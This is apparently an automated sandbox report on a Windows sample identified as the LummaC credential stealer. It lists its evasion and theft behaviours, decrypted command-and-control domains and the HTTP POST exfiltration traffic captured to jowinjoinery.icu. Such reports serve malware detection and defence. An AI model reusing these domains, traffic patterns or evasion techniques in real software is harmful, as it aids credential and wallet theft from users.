Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1634236
MD5:	5583d74a735a4c65191340fd7a465329
SHA1:	b73bb428cc7c3f2e46400d69b619dd21584667cc
SHA256:	213df7a1f96111ae38d9c4b328acb71945f8f3e71a812be045af646abbe28885
Tags:	exeuser-jstrosch
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 8384 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5583D74A735A4C65191340FD7A465329)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1638752339.0000000000A17000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1638552100.00000000009FB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 8384	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 8384	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.ad0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T21:04:46.737412+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	188.114.97.3	443	TCP
2025-03-10T21:05:09.344558+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	188.114.97.3	443	TCP
2025-03-10T21:05:12.261199+0100	2028371	3	Unknown Traffic	192.168.2.5	49714	188.114.97.3	443	TCP
2025-03-10T21:05:15.741968+0100	2028371	3	Unknown Traffic	192.168.2.5	49715	188.114.97.3	443	TCP
2025-03-10T21:05:18.783285+0100	2028371	3	Unknown Traffic	192.168.2.5	49716	188.114.97.3	443	TCP
2025-03-10T21:05:22.636182+0100	2028371	3	Unknown Traffic	192.168.2.5	49717	188.114.97.3	443	TCP
2025-03-10T21:05:28.038364+0100	2028371	3	Unknown Traffic	192.168.2.5	49718	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://jowinjoinery.icu/bdWUa	Avira URL Cloud: Label: malware
Source: https://jowinjoinery.icu:443/bdWUa	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 60%
Source: file.exe	Virustotal: Detection: 56%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.ad0000.0.unpack	String decryptor: jowinjoinery.icu/bdWUa
Source: 0.2.file.exe.ad0000.0.unpack	String decryptor: featureccus.shop/bdMAn
Source: 0.2.file.exe.ad0000.0.unpack	String decryptor: mrodularmall.top/aNzS
Source: 0.2.file.exe.ad0000.0.unpack	String decryptor: legenassedk.top/bdpWO
Source: 0.2.file.exe.ad0000.0.unpack	String decryptor: htardwarehu.icu/Sbdsa
Source: 0.2.file.exe.ad0000.0.unpack	String decryptor: cjlaspcorne.icu/DbIps
Source: 0.2.file.exe.ad0000.0.unpack	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEB1D8 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEB1D8 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEB55A CryptUnprotectData,	0_2_00AEB55A

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	0_2_00B000B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	0_2_00B1C1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-25088CECh]	0_2_00AE2124
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, edx	0_2_00B1C320
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h	0_2_00AEA430
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00AFCBB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]	0_2_00AF0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+10h]	0_2_00AF0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi-000000FEh]	0_2_00B1D0C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_00B073CB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then lea eax, dword ptr [ecx-6C0B83CEh]	0_2_00ADD780
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00AE1822
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F7D6D3F6h	0_2_00B1D960
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+14h]	0_2_00ADDA3A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+317AB538h]	0_2_00ADDA3A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-443B8DA2h]	0_2_00AEE0AC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00AEE0AC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-38B2FA5Ch]	0_2_00B02120
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B02120
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+12h]	0_2_00ADC130
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00ADE174
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000084h]	0_2_00AEE2C6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 720EEED4h	0_2_00B18240
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+08h]	0_2_00B18240
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6C0B83D6h]	0_2_00B18240
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00ADA390
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00ADA390
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_00AEA370
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00B0836E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+03h]	0_2_00AF4430
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00B0845D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B02540
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-52h]	0_2_00B00670
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+2Ch]	0_2_00B00650
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]	0_2_00AF2792
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 8D94E5DFh	0_2_00B14750
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax]	0_2_00B14750
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00B10880
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx edx, byte ptr [ebx+ecx]	0_2_00B1A88E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	0_2_00B1C8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000B2h]	0_2_00AE0994
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp], ebx	0_2_00B069C1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, eax	0_2_00AD8B20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, ecx	0_2_00AEEB66
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [eax+edx+02h], 0000h	0_2_00B14B60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_00AEEEFE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000084h]	0_2_00AEEEFE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+62h]	0_2_00AE2F82
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	0_2_00B190EF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00AF92A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2B12B9D2h]	0_2_00AFF3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00AFD32F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00AED315
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+02h]	0_2_00AE1368
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_00B074D1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00AEB55A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	0_2_00AEB55A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00AEB55A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	0_2_00AEB55A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00B1B680
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00B1B790
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00ADF769
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00B1B9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-443B8DA2h]	0_2_00AED99F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00AED99F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00B1B900
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00AF9910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-79B0712Ah]	0_2_00AFDAA2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, word ptr [eax]	0_2_00AFDAA2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_00AFDAA2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, edi	0_2_00AF3A80
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00B1BA40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+12EB444Ah]	0_2_00ADFB20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+5Dh]	0_2_00ADDC9E

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: jowinjoinery.icu
Source: global traffic	HTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ClI3W3kzbXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14881Host: jowinjoinery.icu
Source: global traffic	HTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T65RXqd8bKyh522r7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15065Host: jowinjoinery.icu
Source: global traffic	HTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M30gmTDPSn9qBwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20539Host: jowinjoinery.icu
Source: global traffic	HTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4pWBcto75KHZXU9GzyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2569Host: jowinjoinery.icu
Source: global traffic	HTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2wCq2c1eu0zJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569809Host: jowinjoinery.icu
Source: global traffic	HTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: jowinjoinery.icu

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: jowinjoinery.icu

Source: unknown

HTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: jowinjoinery.icu

Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732071121.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732052923.0000000000A74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/
Source: file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/D
Source: file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732071121.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732052923.0000000000A74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/Y
Source: file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731882460.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/bdWUa
Source: file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731882460.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/bdWUa5#Q
Source: file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/bdWUaY:
Source: file.exe, 00000000.00000003.1636635709.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/bdWUaq
Source: file.exe, 00000000.00000003.1757851048.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758627826.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/bdWUas
Source: file.exe, 00000000.00000003.1757851048.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758627826.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/bdWUate
Source: file.exe, 00000000.00000003.1676517185.0000000000A72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/d
